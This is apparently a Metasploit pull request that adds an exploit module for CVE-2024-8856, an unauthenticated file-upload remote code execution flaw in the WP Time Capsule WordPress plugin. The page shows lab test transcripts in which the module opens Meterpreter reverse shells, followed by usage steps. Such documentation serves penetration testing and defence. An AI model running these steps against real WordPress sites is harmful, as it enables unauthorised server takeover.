Add exploit module for CVE-2024-8856 - WP Time Capsule RCE #19713
documentation/modules/exploit/multi/http/wp_time_capsule_file_upload_rce.md
Co-authored-by: Julien Voisin <[email protected]>
Great work @Chocapikk! One tiny suggestion. Testing was as expected 🚀
Testing
ARCH_PHP
```
msf6 > use wp_time

Matching Modules
================

   #  Name                                                Disclosure Date  Rank       Check  Description
   -  ----                                                ---------------  ----       -----  -----------
   0  exploit/multi/http/wp_time_capsule_file_upload_rce  2024-11-15       excellent  Yes    WordPress WP Time Capsule Arbitrary File Upload to RCE
   1    \_ target: PHP In-Memory                          .                .          .      .
   2    \_ target: Unix/Linux Command Shell               .                .          .      .
   3    \_ target: Windows Command Shell                  .                .          .      .

Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/wp_time_capsule_file_upload_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'

[*] Using exploit/multi/http/wp_time_capsule_file_upload_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > use 1
[*] Additionally setting TARGET => PHP In-Memory
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set rhost 172.16.199.158
rhost => 172.16.199.158
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set lhost 172.16.199.158
lhost => 172.16.199.158
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set rport 5555
rport => 5555
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > run
[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. WP Time Capsule plugin appears to be vulnerable.
[*] Sending stage (40004 bytes) to 172.24.0.3
[+] Deleted YY.php
[*] Meterpreter session 1 opened (172.16.199.158:4444 -> 172.24.0.3:51180) at 2024-12-12 15:56:54 -0900
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : d41b5b7f71e1
OS          : Linux d41b5b7f71e1 5.15.0-125-generic #135~20.04.1-Ubuntu SMP Mon Oct 7 13:56:22 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter > exit
```
ARCH_CMD
```
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set target 1
target => 1
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > run
[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. WP Time Capsule plugin appears to be vulnerable.
[*] Sending stage (3045380 bytes) to 172.24.0.3
[+] Deleted z5.php
[*] Meterpreter session 2 opened (172.16.199.158:4444 -> 172.24.0.3:45764) at 2024-12-12 15:58:51 -0900
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.24.0.3
OS           : Debian 11.8 (Linux 5.15.0-125-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
```
Release Notes
This exploits a Remote Code Execution (RCE) vulnerability identified as CVE-2024-8856 in the WordPress WP Time Capsule plugin (versions ≤ 1.22.21). This vulnerability allows unauthenticated attackers to upload and execute arbitrary files due to improper validation within the plugin.
Hello Metasploit Team,
I have developed a new Metasploit module that exploits a Remote Code Execution (RCE) vulnerability identified as CVE-2024-8856 in the WordPress WP Time Capsule plugin (versions ≤ 1.22.21). This vulnerability allows unauthenticated attackers to upload and execute arbitrary files due to improper validation within the plugin.
Over 20,000 active installations
msfconsole
use exploit/multi/http/wp_time_capsule_file_upload_rce
RHOSTS to the target IP address
TARGETURI to the WordPress installation path
PAYLOAD (e.g., php/meterpreter/reverse_tcp)
LHOST and LPORT for the payload
exploit
Thank you for your consideration.